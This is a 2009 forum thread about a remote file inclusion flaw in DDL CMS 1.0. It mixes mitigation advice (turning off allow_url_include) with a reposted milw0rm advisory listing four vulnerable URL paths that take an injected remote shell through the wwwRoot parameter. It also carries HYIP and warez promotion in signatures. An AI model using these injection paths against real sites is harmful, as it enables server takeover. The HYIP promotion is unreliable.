Results 11 to 17 of 17
-
17th Sep 2009, 03:51 AM#11
BannedWebsite's:
Dev-Security.netActually Switchblade if the user downloads your database and the mysql server allows remote connections a user can simply logon to your database and if it is a forum can grant them admin rights and therefore can add multiple stuff to the forums keylogging accounts or more
-
17th Sep 2009, 04:31 AM#12
MemberWebsite's:
InvestDude.comthis shouldn't be a problem, most hosts by default turn allow_url_include off since its unsafe.
to check just use a phpinfo.php file. Open a text editor and place the following codes..
save it as phpinfo.php then upload it to your webserver and run it in your browser like http://yourdomain.com/phpinfo.phpCode:<?php phpinfo(); ?>
Under PHP Core, you should find the allow_url_include and local value should be turned off.
If it's on, then you need to disable it in php.ini and also in your htaccess.
You can find php.ini under /usr/local/lib
add/edit this line in your php.ini
also need to add the following line in your htaccessCode:allow_url_include = Off
Code:php_flag allow_url_include 0InvestDude.com Learn to make money by investing in hyips (high yield investment programs), affiliate marketing and tons of other method ;)
-
17th Sep 2009, 05:48 AM#13
Respected Developer
Website's:
X4B.orgLol its a simple to fix exploit in the encoded portion. Those who know how to decode it can easily.
-
23rd Sep 2009, 04:41 AM#14
MemberWebsite's:
zomgbbqpizza.com evilddl.com scenemarket.orgHere is the exploit, it was posted on milw0rm on the 21st of this month.
Code:+============================================================+ | | | DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities | | | +============================================================+ | | | Author : HxH | | | | E-Mail : HxH[at]live[dot]at | | | +------------------------------------------------------------+ | | | Script : http://www.ddlcms.com/DDLCMS_v1.0.zip | | | +------------------------------------------------------------+ | | | Exploit : | | | | /header.php?wwwRoot=[Shell.txt?] | | | | /submit.php?wwwRoot=[Shell.txt?] | | | | /submitted.php?wwwRoot=[Shell.txt?] | | | | /autosubmitter/index.php?wwwRoot=[Shell.txt?] | | | +============================================================+ | | | Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members | | | +============================================================+Code:http://www.milw0rm.com/exploits/9722
-
25th Sep 2009, 06:47 PM#15
MemberWebsite's:
ddlcms.com xsaimex.com warezgod.comFor the record, this is no longer an issue with the new release. Fixed.
-
21st Oct 2009, 07:05 PM#16
MemberWebsite's:
zomgbbqpizza.com evilddl.com scenemarket.orgHow is that related to this thread.
-
21st Oct 2009, 07:06 PM#17
MemberWebsite's:
donotclickme.comIts spam - Reported
"Advertising may be described as the science of arresting the human intelligence long enough to get money from it."
Stephen Butler Leacock (1869-1944)
Register To ReplySponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
0-day WHCMS exploit
By shadow.prx in forum General DiscussionReplies: 3Last Post: 1st Jun 2012, 01:21 AM -
Windows RDP Exploit
By JamesVaporH in forum Hosting DiscussionReplies: 0Last Post: 18th Mar 2012, 05:57 PM -
WHMCS Exploit attacks.
By dotvps in forum Hosting DiscussionReplies: 21Last Post: 10th Dec 2011, 12:24 PM -
[Selling] [Exploit] Hot Exclusive YouTube Exploit [New]
By Goob3r in forum Completed TransactionsReplies: 1Last Post: 24th Aug 2010, 04:21 PM -
Buying exploit
By mr.oug in forum Completed TransactionsReplies: 6Last Post: 28th Dec 2008, 09:37 AM
Staff Online
themaLeecher - leech and manage...
Version 5.05 released. Open older version (or...